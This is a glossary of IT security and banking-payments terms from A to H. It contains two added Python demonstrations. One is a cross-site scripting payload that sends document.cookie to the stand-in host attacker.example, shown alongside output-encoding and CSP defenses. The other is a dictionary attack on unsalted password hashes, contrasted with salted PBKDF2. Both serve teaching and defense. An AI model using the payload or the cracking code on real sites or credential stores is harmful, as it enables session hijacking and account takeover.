Glossary
A

Access - The ability to physically or logically enter or make use of an IT system or area (secured or unsecured); the process of interacting with a system.
Access point - A means of connecting to a system, including a user's home network, a cellular network, NFC, Bluetooth, or public Wi-Fi such as that provided by a municipality or business.
Administrator privileges - Access to computer system resources that are unavailable to most users. Administrator privileges permit the execution of actions that would otherwise be restricted.
Agency - A legal relationship between two parties who agree that one (the agent) is to act on behalf of the other (the principal), subject to the latter's general control. The principal generally is held liable for the agent's actions.
Agility - In IT systems, the ability to rapidly incorporate new technologies or changes to technologies, allowing an organization to adapt to changing business needs.
Air-gapped environment - A security measure that isolates a secure network from unsecure networks physically, electrically, and electromagnetically.
Anomalous activity - Observed events that deviate significantly from a defined baseline of normal activity. It is identified by comparing the definition of what is considered normal against what is actually observed.
Antivirus/anti-malware software - A program that monitors a computer or network to identify malware of all types and to prevent or contain malware incidents.
Application - A software program designed for use by end users.
Application (2) - Software that performs automated functions for a user. Examples include home banking, word processing, and payroll. Distinguished from operating system or utility software.
Application controls - Controls related to transactions and data within application systems. Application controls ensure the completeness and accuracy of the records and the validity of the entries made, whether they result from programmed processing or manual data entry. Examples of application controls include data input validation, agreement of batch totals, and encryption of data transmitted.
Application development - The process of designing and building code to create a computer program (software) used for a particular type of job.
Application security - The use of software, hardware, and procedural methods to protect applications from external threats.
Application store - A digital distribution platform for computer software, often in a mobile context.
Application system - An integrated set of computer programs designed to serve a well-defined function and having specific input, processing, and output activities (e.g., general ledger, manufacturing resource planning, human resource management).
Asset - In computer security, a major application, general-support system, high-impact program, physical plant, mission-critical system, personnel, equipment, or a logically related group of systems.
ATM - Asynchronous transfer mode. A networking technology that carries data in small, fixed-size (53-byte) cells over switched virtual circuits; historically used in carrier and campus backbones. Can also mean automated teller machine.
Attack signature - A specific sequence of events indicative of an unauthorized access attempt, which detection tools match against observed traffic or log records.
Audit charter - A document approved by the board of directors that defines the IT audit function's responsibility, authority to review records, and accountability.
Audit plan - A description and schedule of audits to be performed in a certain period of time (ordinarily a year). It includes the areas to be audited, the type of work planned, the high-level objectives and scope of the work, and other items such as budget, resource allocation, schedule dates, and type of report issued.
Audit program - The audit policies, procedures, and strategies that govern the audit function, including IT audit.
Authentication - The process of verifying the identity of an individual user, machine, software component, or any other entity.
Availability - Whether, or how often, a system is available for use by its intended users. Because downtime is usually costly, availability is an integral component of security.

B

Bandwidth - Terminology used to indicate the transmission or processing capacity of a system, or of a specific location in a system (usually a network), for information (text, images, video, sound). Bandwidth is usually measured in bits per second (bps) but is also often described loosely as large or small. As a historical point of reference, a full page of English text is about 16,000 bits, a dial-up modem could move approximately 15,000 bps, and full-motion, full-screen video requires about 10,000,000 bps, depending on compression.
Baseline configuration - A set of specifications for a system, or for a configuration item (CI) within a system, that has been formally reviewed and agreed on at a given point in time and that can be changed only through change control procedures. The baseline configuration is used as a basis for future builds, releases, or changes.
Benchmark - A standard, or point of reference, against which things may be compared or assessed.
Biometric - The measurement and analysis of physical attributes such as facial features, voice, or retinal patterns. This technology can be used to establish an individual's unique identity, often for security purposes.
Black holing - A method typically used by ISPs to stop a DDoS attack on one of their customers: traffic destined for the targeted address is routed to a null destination and discarded. This approach blocks the attack by making the site in question completely inaccessible to all traffic, malicious and legitimate alike.
Border router - A device located at the organization's boundary to an external network.
BPS - Bits per second. A measurement of how fast data moves from one place to another. A 28.8 modem can move 28,800 bits per second.
Buffer overflow - A condition at an interface under which more input is placed into a buffer or data-holding area than the capacity allocated, overwriting adjacent memory. Attackers exploit such a condition to crash a system or to inject specially crafted code or control data that lets them take control of the affected process.
Business continuity - The ability to maintain operations and services, both technology and business, in the event of a disruption to normal operations and services. It ensures that any impact or disruption of services is within a documented and acceptable recovery time period and that the system or operations are resumed at a documented and acceptable point in the processing cycle.
Business resilience - The capacity to maintain functions and organizational structure in the face of an internal or external change or threat, recover from a significant disruption, and continue critical operations with minimal impact.

C

Capacity planning - The process used to determine whether a service, application, or process is sufficient to handle volumes at peak times and meet growth projections for a specific period of time. Analysis should consider hardware (networks, servers, routers, etc.), software (operating system and application software), and personnel.
CAR - Courtesy amount recognition. Automated recognition of the numeric (courtesy) amount of a check.
Cash letter - A group of checks accompanied by a paper listing sent to a clearinghouse, a Federal Reserve Bank, or another institution. A cash letter contains a number of negotiable items, mostly checks, accompanied by a letter that lists the amounts and instructions for transmittal to another bank. May also be called a transmittal letter. An incoming cash letter is one received by an institution from a clearinghouse, a Federal Reserve Bank, or another institution and contains checks written on accounts at the institution that were cashed elsewhere. An outgoing cash letter is one sent to a clearinghouse, a Federal Reserve Bank, or another institution and contains checks deposited at the institution that are written on accounts at other institutions.
Change management - The broad processes for managing organizational change. Change management encompasses planning, oversight or governance, project management, testing, and implementation.
Check 21 Act - Formally known as the Check Clearing for the 21st Century Act. It creates a new document, the IRD (image replacement document, or substitute check), that is the legal equivalent of the original check and must be accepted as such. The act does not require institutions to accept electronic images instead of checks or IRDs, but it does require the acceptance of IRDs instead of paper checks. The exchange of electronic images is optional and is governed by agreements between individual institutions, groups of institutions, or clearinghouses.
CHIPS - Clearing House Interbank Payments System. A private-sector U.S.-dollar funds transfer system that clears and settles cross-border and domestic payments.
Classification - Categorization (e.g., "confidential," "sensitive," or "public") of the information processed by the service provider on behalf of the receiver company.
Cloud computing - Generally a migration from owned resources to shared resources in which client users receive information technology services on demand from third-party service providers via the Internet "cloud." In cloud environments, a client or customer relocates its resources, such as data, applications, and services, to computing facilities outside the corporate firewall, which the end user then accesses via the Internet.
Clustering - Connecting two or more computers together in such a way that they can act as a single computer. Clustering is used for parallel processing, load balancing, and fault tolerance.
Code analysis - Use of tools to analyze source code (static analysis) or compiled or running code (binary or dynamic analysis) to help find security flaws.
Computer security - Technological and managerial procedures applied to computer systems to ensure the availability, integrity, and confidentiality of the information managed by the computer system.
Confidentiality - Assuring that information will be kept secret, with access limited to appropriate persons.
Configuration management - The management of security features and assurances through control of changes made to a system's hardware, software, firmware, documentation, testing, test fixtures, and test documentation throughout the development and operational life of the system.
Contingency plan - A plan for emergency response, backup operations, and post-disaster recovery maintained by an institution as part of its security program. The plan ensures the availability of critical resources and facilitates the continuity of operations in an emergency situation.
Control requirements - The process used to document and/or track internal processes to determine that established procedures and/or physical security policies are being followed.
Control self-assessment - A technique used to internally assess the effectiveness of risk management and control processes.
Conversion plan - A plan that details transition planning and implementation issues in the period between the execution of an outsourcing agreement and the full production use of the outsourced services.
Corrective control - A mitigating technique designed to lessen the impact on the institution when adverse events occur.
COTS - Commercial off-the-shelf. COTS products include software and hardware products that are ready-made and available for sale to the general public. COTS products are typically installed in existing systems and do not require customization. Also known as "shrink-wrap" applications.
Crisis management - The process of managing an institution's operations in response to an emergency or event that threatens business continuity. An institution's ability to communicate with employees, customers, and the media, using various communications devices and methods, is a key component of crisis management.
Critical system (infrastructure) - The systems and assets, whether physical or virtual, that are so vital that their incapacity or destruction may have a debilitating impact.
Cross-site scripting - A type of computer security vulnerability, typically found in web applications, that enables attackers to inject client-side scripts into web pages viewed by other users, usually because user-supplied input is written into a page without output encoding. Script injected this way runs with the privileges of the vulnerable site's origin, so it can read session cookies or act as the victim user, bypassing the protection the same-origin policy would otherwise provide. Defenses against cross-site scripting (XSS) include context-aware output encoding, input validation, and a restrictive Content Security Policy.
Custom redirect service - A service that enables control over the destination of incoming calls, or the redirection of calls to various locations or pre-established phone numbers, to ensure customer service continuity.
Cyber attack - An attempt to damage, disrupt, or gain unauthorized access to a computer, computer system, or electronic communications network. An attack, via cyberspace, targeting an institution for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment or infrastructure, destroying the integrity of data, or stealing controlled information.
Cyber event - A cybersecurity change or occurrence that may have an impact on organizational operations (including mission, capabilities, or reputation).
Cyber incident - Actions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system or the information residing therein.
Cyber resilience - The ability of a system or domain to withstand cyber attacks or failures and, in such events, to reestablish itself quickly.
Cyber threat - An internal or external circumstance, event, action, occurrence, or person with the potential to exploit technology-based vulnerabilities and to adversely impact organizational operations, organizational assets (including information and information systems), individuals, other organizations, or society.
Cybersecurity - The process of protecting consumer and bank information by preventing, detecting, and responding to attacks.

D

DASD - See "Direct access storage device (DASD)".
Data center - A facility that houses an institution's most important information systems components, including computer systems, telecommunications components, and storage systems.
Data classification program - A program that categorizes data to convey the required safeguards for information confidentiality, integrity, and availability, and establishes the controls required based on value and level of sensitivity.
Data corruption - Errors in computer data that occur during writing, reading, storage, transmission, or processing and introduce unintended changes to the original data.
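The Cross-site scripting entry above describes input being written into a page without output encoding. The following is an added example, not part of the glossary: it places the vulnerable concatenation beside context-aware encoding for the HTML text context and the URL-in-attribute context, plus a Content-Security-Policy header as a second layer. The page fragments, the query parameter, the host attacker.example and the payload are constructed for illustration.

```python
"""Cross-site scripting: unescaped interpolation beside context-aware output encoding.

Added example, not part of the glossary. The page fragments, the query parameter and
the attacker payload (including the host attacker.example) are constructed.
"""
import html
from urllib.parse import quote

# Constructed attacker-controlled input, e.g. the q= parameter of a crafted link.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    """Classic reflected XSS: user input concatenated straight into HTML."""
    return f"<h1>Results for {query}</h1>"


def render_hardened(query: str) -> str:
    """HTML text context: encode <, >, &, quotes so the payload is displayed, not run."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def render_search_link(query: str) -> str:
    """URL-in-attribute context needs two layers: percent-encode the parameter value,
    then HTML-encode the whole attribute value and keep the attribute quoted."""
    href = "/search?q=" + quote(query, safe="")
    return f'<a href="{html.escape(href, quote=True)}">search again</a>'


def csp_header() -> dict:
    """Defense in depth: a Content-Security-Policy that forbids inline script, so an
    encoding mistake elsewhere in the page still cannot execute injected <script> text."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'"}


def contains_script_tag(markup: str) -> bool:
    """Demo check: does a raw <script> tag survive into the emitted markup?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for name, renderer in [("vulnerable", render_vulnerable),
                           ("hardened", render_hardened),
                           ("link", render_search_link)]:
        out = renderer(PAYLOAD)
        print(f"{name:10s} script survives={contains_script_tag(out)}  {out}")
    print(csp_header())
```

The encoding function has to match the context the value lands in: `html.escape` is correct for element text and for a quoted attribute, but a value placed inside a URL must first be percent-encoded, and a value placed inside inline JavaScript would need a different encoder again. The CSP header does not replace encoding; it limits the damage when encoding is missed.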
Data integrity - The property that data has not been destroyed or corrupted in an unauthorized manner; maintaining and assuring the accuracy and consistency of data over its entire life cycle.
Data loss prevention (DLP) - A comprehensive approach (covering people, processes, and systems) to implementing policies and controls designed specifically to discover, monitor, and protect confidential data wherever it is stored, used, or in transit over the network and at the perimeter.
Data mining - The process or techniques used to analyze large sets of existing information to discover previously unrevealed patterns or correlations.
Data mirroring - A back-up process that involves writing the same data to two physical disks or servers simultaneously.
Data replication - The process of copying data, usually with the objective of maintaining identical sets of data in separate locations. Two common data replication processes used for information systems are synchronous and asynchronous mirroring.
Data security - The process of safeguarding important information from unauthorized access, corruption, or loss.
Data synchronization - The comparison and reconciliation of interdependent data files at the same time so that they contain the same information.
Data transmission security - The transfer of confidential or proprietary information over a secure channel.
Database - A collection of data that is stored on any type of computer storage medium and may be used for more than one purpose.
Daylight overdraft - A daylight overdraft occurs at any point in the business day when the balance in an institution's account becomes negative. Daylight overdrafts can occur in accounts at Federal Reserve Banks as well as at private financial institutions. Daylight credit can also arise in the form of net debit positions of participants in private payment systems. A daylight overdraft occurs at a Federal Reserve Bank when there are insufficient funds in an institution's Federal Reserve Bank account to cover outgoing funds transfers or incoming book-entry securities transfers. An overdraft can also be the result of other payment activity processed by the Federal Reserve Bank, such as check or automated clearinghouse transactions.
Debit card - A payment card issued either as a PIN-based debit (ATM) card or as a signature-based debit card from one of the bankcard associations. It allows the holder to purchase goods and services through an electronic transfer of funds from a demand deposit account rather than using cash, checks, or drafts at the point of sale.
Debit entry - An entry to the record of an account to represent the transfer or removal of funds from the account.
Dedicated Synchronous Optical Network (SONET) - A standard for telecommunications transmission over fiber optic cables. SONET is self-healing: if a break occurs in the lines, it can use a redundant back-up ring to ensure that transmission continues. SONET networks can carry voice and data over optical networks.
Deep packet inspection - The capability to examine the payload of network packets, not only their headers, so that observed traffic can be compared against profiles of expected protocol behavior (typically vendor-developed) to identify deviations and known attack patterns.
Defense-in-depth - An information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.
Deferred net settlement - See "National Settlement Service".
Deliverable - A project goal or expectation. Deliverables include broadly defined project or phase requirements and specifically defined tasks within project phases.
Depository - An institution that holds funds or marketable securities for safekeeping. Depositories may be privately or publicly operated, allow securities transfers through book entry, and offer funds accounts permitting funds transfers as a means of payment.
Depository bank - The institution at which a check is first deposited. While this term is often used interchangeably with "depository," "depositary" is a term of art in laws and regulations related to check processing.
Depository bank (Check 21) - Also known as bank of first deposit (BOFD). The first bank to which a check is transferred, even if it is also the paying bank or the payee. A check deposited in an account is deemed to be transferred to the financial institution holding the account into which the check is deposited, even though the check is physically received and endorsed first by another financial institution.
Detective control - A mitigating technique designed to recognize an event and alert management when the event occurs.
Device fingerprinting - Information collected about a remote computing device for the purpose of identification.
Dictionary attack - Discovery of passwords or other authenticators by applying the same transformation used to store them (typically a cryptographic hash) to a list of likely candidates and comparing each result with the stored value. Per-user salts, deliberately slow hashing, and rate limiting raise the cost of such an attack.
Digital certificate - An electronic credential, signed by a certificate authority, that binds a public key to the identity of its holder. It is the electronic equivalent of an ID card and lets a recipient verify a digital signature or authenticate a server or user.
Digital subscriber line (DSL) - DSL provides the ability to transmit high-speed digital signals over existing telephone lines.
Direct access storage device (DASD) - A magnetic disk storage device historically used in mainframe environments. DASD may also include hard drives used in personal computers.
Direct data feed - A process used by information aggregators to gather information directly from a website operator rather than copying it from a displayed webpage.
Direct debit - An electronic transfer, usually through ACH, out of an individual's checking (or savings) account to pay bills, such as mortgage payments, insurance premiums, and utility payments. Also referred to as "direct payment."
Direct deposit - An electronic deposit or credit, usually through ACH, to an individual's deposit account. Common uses of direct deposit include payroll payments, Social Security benefits, and income from investments such as CDs, annuities, and mutual funds.
Direct presentment - Depositary banks can present checks directly to the paying institution. The paying institution may be the depositary bank (in which case no settlement is needed) or, if not, may settle on the books of the Federal Reserve using the Federal Reserve's national settlement service.
Disaster recovery - The process of recovering from major processing interruptions.
Disaster recovery exercise - A test of an institution's disaster recovery plan or BCP.
Disaster recovery plan - A plan that describes the process to recover from major processing interruptions.
Disk shadowing - A back-up process that involves writing images to two physical disks or servers simultaneously.
Distributed denial of service (DDoS) - A type of attack that makes a computer resource or resources unavailable to its intended users. Although the means, motives, and targets of a DDoS attack may vary, it generally consists of traffic or requests sent at once from many compromised or coordinated systems, intended to prevent an Internet site, service, or application from functioning and thereby to damage the institution's reputation.
Distributed environment - A computer system with data and program components physically distributed across more than one computer.
Diversity - A description of financial services sectors in which primary and back-up telecommunications capabilities do not share a single point of failure.
DMZ - Abbreviation for "demilitarized zone." A computer or small subnetwork that sits between a trusted internal network, such as a corporate private LAN, and an untrusted external network, such as the public Internet.
DNS Server - Domain Name System server. A computer that resolves domain names presented in a convenient, readable form to numeric Internet Protocol (IP) addresses (and the reverse).
Domain Name System security extensions (DNSSEC) - Extensions to DNS that protect against forged or poisoned DNS responses by digitally signing DNS records, so that a validating resolver can verify that the data it receives is authentic and has not been modified.
DSL - Digital subscriber line. A technology that uses existing copper telephone lines and advanced modulation schemes to provide high-speed telecommunications to businesses and homes.
Dual control - Dividing the responsibility for a task into separate, accountable actions to ensure the integrity of the process.
Due diligence - A technical, functional, and financial review to verify a third-party service provider's ability to deliver the requirements specified in its proposal. The intent is to verify that the service provider has a well-developed plan and adequate resources and experience to ensure acceptable service, controls, systems backup, availability, and continuity of service to its clients.

E

E-Banking - The remote delivery of new and traditional banking products and services through electronic delivery channels.
Electronic Benefits Transfer (EBT) - A type of EFT system involving the transfer of public entitlement payments, such as welfare or food stamps, through direct deposit or point-of-sale technology (see POS). The recipient can be given an identification card, similar to a benefit card, and a PIN allowing access to the benefits through an electronic network.
Electronic bill presentment and payment (EBPP) - An electronic alternative to traditional bill payment, allowing a merchant or utility to present its customers with an electronic bill and the payer to pay the bill electronically. EBPP systems usually fall within two models: direct and consolidation-aggregation. In the direct model, the merchant or utility generates an electronic version of the consumer's billing information and notifies the consumer of a pending bill, generally via e-mail. The consumer can initiate payment of the electronically presented bill using a variety of payment mechanisms, typically a credit card. In the consolidation-aggregation model, the consumer's bills are consolidated by a consolidator acting on behalf of merchants and utilities (or aggregated on behalf of the consumer), combining data from multiple bills and presenting a single source from which the consumer can initiate payment. Some consolidators present bills at their own web sites; most support the aggregation of bills by consumer service providers such as Internet portals, financial institutions, and brokerage web sites.
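The Dictionary attack entry above says the attack works by transforming likely authenticators and comparing the results with the stored values. The following is an added example, not part of the glossary: it runs a small dictionary against a constructed credential store, first against unsalted, fast hashes (where one table of candidate hashes serves every user) and then against salted PBKDF2 records (where every candidate must be re-derived per user, slowly). The wordlist, user names, passwords and salts are all constructed for illustration.

```python
"""Dictionary attack against stored password hashes, and the salted, slow hash that resists it.

Added example, not part of the glossary. Users, passwords, salts and the wordlist are
constructed; a real attacker would use a far larger wordlist and GPU hardware.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

# Constructed wordlist of likely authenticators.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2024", "correcthorse"]


def md5_hex(password: str) -> str:
    """Legacy storage: fast, unsalted hash (the weak scheme the attack targets)."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_hex(password: str, salt: bytes, iterations: int = 100_000) -> str:
    """Current storage: per-user salt plus a deliberately slow key-derivation function."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


# Constructed credential store. Alice and Bob reuse a password; with unsalted hashing
# their stored values are identical, which already leaks that fact to anyone reading the table.
LEGACY_STORE: Dict[str, str] = {
    "alice": md5_hex("letmein"),
    "bob": md5_hex("letmein"),
    "carol": md5_hex("Tr0ub4dor&3"),   # not in the wordlist; survives this attack
}
_DAVE_SALT = os.urandom(16)           # in practice stored next to the hash
CURRENT_STORE: Dict[str, Tuple[bytes, str]] = {"dave": (_DAVE_SALT, pbkdf2_hex("letmein", _DAVE_SALT))}


def crack_unsalted(store: Dict[str, str]) -> Tuple[Dict[str, Optional[str]], int]:
    """Hash every candidate once, then look each stored hash up in that table.
    The work is len(WORDLIST) no matter how many users the store holds."""
    table = {md5_hex(word): word for word in WORDLIST}
    recovered = {user: table.get(stored) for user, stored in store.items()}
    return recovered, len(table)


def crack_salted(store: Dict[str, Tuple[bytes, str]],
                 iterations: int = 100_000) -> Tuple[Dict[str, Optional[str]], int]:
    """With a per-user salt no shared table is possible: every candidate must be
    re-derived for every user, and each derivation is slow by design.
    Returns the recovered passwords and the number of derivations performed."""
    recovered: Dict[str, Optional[str]] = {}
    work = 0
    for user, (salt, stored) in store.items():
        recovered[user] = None
        for word in WORDLIST:
            work += 1
            # Constant-time comparison, as a verifier should use on the login path too.
            if hmac.compare_digest(pbkdf2_hex(word, salt, iterations), stored):
                recovered[user] = word
                break
    return recovered, work


if __name__ == "__main__":
    print("unsalted MD5:", crack_unsalted(LEGACY_STORE))
    print("salted PBKDF2:", crack_salted(CURRENT_STORE))
```

Against the unsalted store the attacker computes six hashes and recovers two accounts at once; against the salted store the same six words cost six slow derivations per user, and adding users multiplies the work rather than sharing it. A memory-hard function such as scrypt or Argon2, together with rate limiting on the login path, raises the cost further.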
Electronic check conversion - The process by which a check is used as a source of information for the check number, the customer's account number, and the number that identifies the financial institution. The information is used to make a one-time electronic payment from the customer's account, an electronic fund transfer. The check itself is not the method of payment.
Electronic check presentment (ECP) - A check truncation methodology in which the paper check's MICR line information is captured and stored electronically for presentment. The physical checks may or may not be presented after the electronic files are delivered, depending on the type of ECP service used.
Electronic commerce (E-Commerce) - A broad term encompassing the remote procurement and payment by businesses or consumers of goods and services through electronic systems such as the Internet.
Electronic data capture (EDC) - The process used for capturing and transferring the encoded information on the magnetic stripe of a bankcard or debit card at the point of sale to the processor's database.
Electronic funds transfer (EFT) - A generic term describing any transfer of funds between parties or depository institutions through electronic data systems.
Electronic Funds Transfer Act (EFTA) - The Electronic Funds Transfer Act and Regulation E are designed to ensure adequate disclosure of basic terms, costs, and rights relating to electronic fund transfer (EFT) services provided to consumers. Institutions offering EFT services must disclose to consumers certain information, including initial and updated EFT terms, transaction information, periodic statements of activity, the consumer's potential liability for unauthorized transfers, and error resolution rights and procedures. EFT services include automated teller machines, telephone bill payment, point-of-sale transfers in retail stores, fund transfers initiated through the Internet, and pre-authorized transfers to or from a consumer's account.
Electronic vaulting - A back-up procedure that copies changed files and transmits them to an off-site location using a batch process.
Electronically-created payment orders - Payment orders received by merchants from consumers, typically by telephone or the Internet. These payment orders are processed through the check processing system although they were not initiated as paper checks. They are not subject to check law and are not warranted by the Federal Reserve Banks.
E-mail server - A computer that manages e-mail traffic.
Emergency plan - The steps to be followed during and immediately after an emergency such as a fire, tornado, or bomb threat.
Encryption - A data security technique used to protect information from unauthorized inspection. Information is transformed with a key into ciphertext that appears as a meaningless string of letters and symbols during storage or transmission; the authorized recipient reverses the transformation (decryption) with the corresponding key. Encryption by itself does not prevent alteration of the data; authenticated encryption or a separate integrity check is needed to detect tampering.
End user - An individual who will utilize a product or program.
End-of-life - All software products have life cycles. End-of-life refers to the date after which the vendor no longer provides fixes, updates, or technical assistance for the product. Software that is past end-of-life accumulates unpatched vulnerabilities.
Endpoint security - Security controls that validate the security posture of a client system before it is allowed to connect, for example through a Secure Sockets Layer/Transport Layer Security (SSL/TLS) virtual private network (VPN). Endpoint security controls also include protection mechanisms, such as Web browser cache cleaners, that remove sensitive information from client systems.
End-to-end process flow - A document that details the flow of the processes, considering automated and manual control points, hardware, databases, network protocols, and real-time versus periodic processing characteristics.
End-to-end recoverability - The ability of an institution to recover a business process from initiation, such as customer contact, through process finalization, such as transaction closure.
Enterprise architecture - The overall design and high-level plan that describes an institution's operational framework and includes the institution's mission, stakeholders, business and customers, work flow and processes, data processing, access, security, and availability.
Enterprise network - The configuration of computer systems within an organization. It includes local area networks (LANs), wide area networks (WANs), bridges, applications, etc.
Enterprise-wide - Across an entire organization, rather than a single business department or function.
Expedited Funds Availability Act (EFAA) - See "Regulation CC".
Exploit - Code or a technique that uses a vulnerability to give the attacker access to, or control of, a system. An exploit is an intentional attack on an operating system or application program.
Exposure - The potential loss to an area due to the occurrence of an adverse event.
Exposure limit - In reference to the settlement of operating services, the maximum amount an ACH originator is allowed to originate. This amount can be based on the originator's credit rating, historical or predicted funding requirements, and the type of obligation.
External Connections - An information system or component of an information system that is outside of the authorization boundary established by the organization and over which the organization typically has no direct control of the application of required security controls or the assessment of security control effectiveness.

F

Federal Reserve Banks - The Federal Reserve Banks provide a variety of financial services, including retail and wholesale payments, and operate a nationwide system for clearing and settling checks drawn on depository institutions located in all regions of the United States.
Fedwire® - The Federal Reserve Banks' nationwide real-time gross settlement electronic funds and securities transfer network. Fedwire® is a credit transfer system. Each funds transfer is settled individually against an institution's reserve or clearing account on the books of the Federal Reserve. The transaction is considered an irrevocable payment as it is processed.
Fedwire® Funds Service - The Federal Reserve Banks' high-speed electronic funds transfer system. As a real-time gross settlement system, the Fedwire® Funds Service processes and settles individual payments between participants immediately in central bank money. Once processed, these payments are final.
Fedwire® Securities Service - The Federal Reserve Banks' high-speed electronic payments system for maintaining securities accounts and for effecting securities transfers. The Fedwire® Securities Service provides a real-time, delivery-versus-payment (DVP), gross settlement system that allows for the immediate, simultaneous transfer of securities against payment. Once processed, securities transfers are final.
FEMA - Federal Emergency Management Agency.
Fibre channel - A high-performance serial link that carries its own protocol as well as higher-level protocols such as the Small Computer System Interface (SCSI), the High Performance Parallel Interface (HIPPI) framing protocol, and the Intelligent Peripheral Interface (IPI). The Fibre Channel standard addresses the need for very fast transfers of large amounts of information. The technology (1 gigabit per second in the original standard, with later generations considerably faster) can be adapted for LAN use by adding a switch, specified in the Fibre Channel standard, that handles multipoint addressing. Fibre Channel gives users one port that supports both channel and network interfaces, unburdening computers of large numbers of input/output (I/O) ports, and provides flow control and complete error checking over the link.
FIN (Financial Application) - The SWIFT application within which all SWIFT user-to-user messages are input and output.
Finality - Irrevocable and unconditional transfer of payment during settlement.
Financial Authority - A supervisory organization that is responsible for safeguarding and maintaining consumer confidence in the financial system.
Financial EDI (FEDI) - Financial electronic data interchange. An instrument for settling invoices by initiating payments, processing remittance data, and automating reconciliation through the exchange of electronic messages.
Financial industry participants - Financial institutions and other companies that are involved in the banking, securities, and/or insurance industry and are regulated by supervisory authorities.
Financial Services Information Sharing and Analysis Center (FS-ISAC) - A nonprofit information-sharing forum established by financial services industry participants to facilitate the public and private sectors' sharing of physical and cybersecurity threat and vulnerability information.
Firewall - A hardware or software link in a network that relays only the data packets that policy permits, i.e., those clearly intended and authorized to reach the other side, and drops the rest.
Firmware - A software program or set of instructions programmed into a hardware device.
Float - Funds held by an institution during the check-clearing process before being made available to a depositor. Interest may be earned on these funds.
Flowcharts - Traditional flowcharts use geometric symbols, such as diamonds, ovals, and rectangles, to represent the sequencing of program logic. Software packages are available that automatically chart programs or enable a programmer to chart a program without drawing it manually.
Frame relay - A high-performance WAN protocol that operates at the physical and data link layers of the Open Systems Interconnection (OSI) reference model. Frame relay is an example of a packet-switched technology. Packet-switched networks enable end stations to dynamically share the network medium and the available bandwidth. Frame relay uses existing T-1 and T-3 lines and provides connection speeds from 56 Kbps to T-1.
Framing - A frame is an area of a webpage that scrolls independently of the rest of the webpage. Framing generally refers to the use of a standard frame containing information (such as the company name and navigation bars) that remains on the screen while the user moves around the text in another frame.
FTP (file transfer protocol) - A standard high-level protocol for transferring files from one computer to another, usually implemented as an application-level program. FTP transmits credentials and file contents in cleartext, so SFTP or FTPS should be used where confidentiality or integrity matters.
Full duplex - A communications channel that carries data in both directions simultaneously.
Full-interruption/full-scale test (IT and Staff) - A business continuity test that activates all the components of the disaster recovery plan at the same time. Hardware, software, staff, communications, utilities, and alternate site processing should be thoroughly tested in this type of testing activity. The exercise should include the business line end users and the IT group to ensure that each business line tests its key applications and is prepared to recover and resume its business operations in the event of an emergency. The full test verifies that systems and staff can recover and resume business within established recovery time objectives. End users should verify the integrity of the data at the alternate site after the IT group has restored the systems and applications needed for the staff to perform production activities.
Functional drill/parallel test - A test that involves the actual mobilization of personnel at other sites in an attempt to establish communications and coordination as set forth in the BCP.
Functional requirements - The business, operational, and security features an organization wants included in a program.
Functionality testing - A test designed to validate that a business process or activity accomplishes the expected results.

G

Gap analysis - A comparison that identifies the difference between actual and desired outcomes.
Gateway server - A computer (server) that connects a private network to the private network of a servicer or other business.
General controls - Controls, other than application controls, that relate to the environment within which application systems are developed, maintained, and operated, and that are therefore applicable to all the applications at an institution. The objectives of general controls are to ensure the proper development and implementation of systems, and the integrity of program and data files and of computer operations. Like application controls, general controls may be either manual or programmed. Examples of general controls include the development and implementation of an IT strategy and an IT security policy, the organization of IT staff to separate conflicting duties, and planning for disaster prevention and recovery.
Geolocation - The identification of the real-world geographic location of an object, such as a radar source, mobile phone, or Internet-connected computer terminal.
GETS - Acronym for the Government Emergency Telecommunications Service card program. GETS cards provide emergency access and priority processing for voice communications services in emergency situations.
Governance - In computer security, governance means setting clear expectations for the conduct (behaviors and actions) of the entity being governed and directing, controlling, and strongly influencing the entity to achieve these expectations. Governance includes specifying a framework for decision making, with assigned decision rights and accountability, intended to consistently produce desired behaviors and actions.
Gramm-Leach-Bliley Act (GLBA) - The GLBA, also known as the Financial Services Modernization Act of 1999 (Pub.L. 106-102, 113 Stat. 1338, enacted November 12, 1999), required the Federal banking agencies to establish information security standards for financial institutions.
Grandfather-father-son - Retaining multiple versions of the back-up files off-site on a “grandfather-father-son” rotating basis is recommended. This tape methodology creates three sets of back-up tapes: daily incremental sets or “sons,” weekly full sets or “fathers,” and end-of-month tapes or “grandfathers.”
H
Hacker - An individual who attempts to break into a computer without authorization.
Haircut - With respect to an eligible currency, the percentage increase of a negative currency balance or reduction of a positive currency balance, based on (a) the volatility of the historic foreign exchange movements in the applicable eligible currency determined by CLS Bank and (b) an add-on component.
Hardening - The process of securing a computer’s administrative functions or inactivating those features not needed for the computer’s intended business purpose.
Hardware - The physical elements of a computer system; the computer equipment as opposed to the programs or information stored in a machine.
Hash - A fixed-length cryptographic output of variables, such as a message, being operated on by a formula or cryptographic algorithm.
Hash Totals - A numerical summation of one or more corresponding fields of a file that would not ordinarily be summed. Typically used to detect when changes in electronic information have occurred.
HBA - Host bus adapter. A host bus adapter provides I/O processing and physical connectivity between a server and storage. As the only part of a storage area network that resides in a server, HBAs also provide a critical link between the storage area network and the operating system and application software.
Hierarchical storage management (HSM) - HSM is used to dynamically manage the back-up and retrieval of files based on how often they are accessed, using storage media and devices that vary in speed and cost.
Hijacking - The use of an authenticated user’s communication session to communicate with system components.
Hop - Each step of a trip a data packet takes from its origination to its destination. For example, on the Internet a data packet may go through several routers before reaching its final destination.
Host - A computer that is accessed by a user from a remote location.
Hosting - See "Website Hosting".
HTML - Abbreviation for “Hypertext Markup Language.” A set of codes that can be inserted into text files to indicate special typefaces, inserted images, and links to other hypertext documents.
Hub - Simple devices that pass all data traffic in both directions between the LAN sections they link. Hubs forward every message they receive to the other sections of the LAN, even those that do not need to go there.
HVAC - Heating, ventilation, and air conditioning.
Hyperlink - An item on a webpage that, when selected, transfers the user directly to another location in a hypertext document or to another webpage, perhaps on a different machine. Also simply called a “link.”
